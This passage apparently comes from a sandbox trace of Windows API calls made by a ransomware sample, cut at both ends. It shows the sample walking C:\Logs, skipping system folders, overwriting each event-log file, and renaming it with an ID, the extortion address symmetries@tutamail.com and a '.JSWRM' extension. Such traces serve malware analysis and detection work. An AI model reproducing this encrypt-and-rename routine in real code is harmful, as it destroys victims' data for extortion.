lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0065.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchWideChar=42, lpMultiByteStr=0x1f87c0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpUsedDefaultChar=0x0) returned 42 [0065.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0065.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0065.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0065.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchWideChar=42, lpMultiByteStr=0x1f8328, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpUsedDefaultChar=0x0) returned 42 [0065.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0065.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0065.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0065.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0065.800] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.802] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.802] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.802] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.808] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.808] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.808] CloseHandle (hObject=0x450) returned 1 [0065.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0065.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0065.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0065.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0065.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0065.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0065.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0065.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0065.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.828] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0065.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0065.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0065.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.829] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cAlternateFileName="MI36C5~1.EVT")) returned 1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2=".") returned 1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="..") returned 1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="...") returned 1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="windows") returned -1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="recovery") returned -1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="perflogs") returned -1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="system volume information") returned -1 [0065.829] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpString2="msocache") returned -1 [0065.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0065.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f8328, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0065.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0065.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f84e8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0065.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0065.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0065.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0065.830] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.830] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.830] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.830] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.836] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.836] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.837] CloseHandle (hObject=0x450) returned 1 [0065.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0065.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0065.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0065.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0065.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.839] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0065.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0065.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0065.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.840] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Known Folders API Service.evtx", cAlternateFileName="MI86D6~1.EVT")) returned 1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2=".") returned 1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="..") returned 1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="...") returned 1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="windows") returned -1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="recovery") returned -1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="perflogs") returned -1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="documents and settings") returned 1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="system volume information") returned -1 [0065.840] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="msocache") returned -1 [0065.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0065.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Known Folders API Service.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Known Folders API Service.evtx", cchWideChar=48, lpMultiByteStr=0x20e268, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Known Folders API Service.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0065.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0065.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Known Folders API Service.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Known Folders API Service.evtx", cchWideChar=48, lpMultiByteStr=0x20e418, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Known Folders API Service.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0065.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0065.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0065.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0065.841] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.841] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.841] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.841] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.847] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.848] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.848] CloseHandle (hObject=0x450) returned 1 [0065.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0065.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0065.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0065.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0065.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0065.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.851] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0065.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0065.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.852] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-LiveId%4Operational.evtx", cAlternateFileName="MI4C58~1.EVT")) returned 1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2=".") returned 1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="..") returned 1 [0065.852] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="...") returned 1 [0065.852] lstrcmpiW 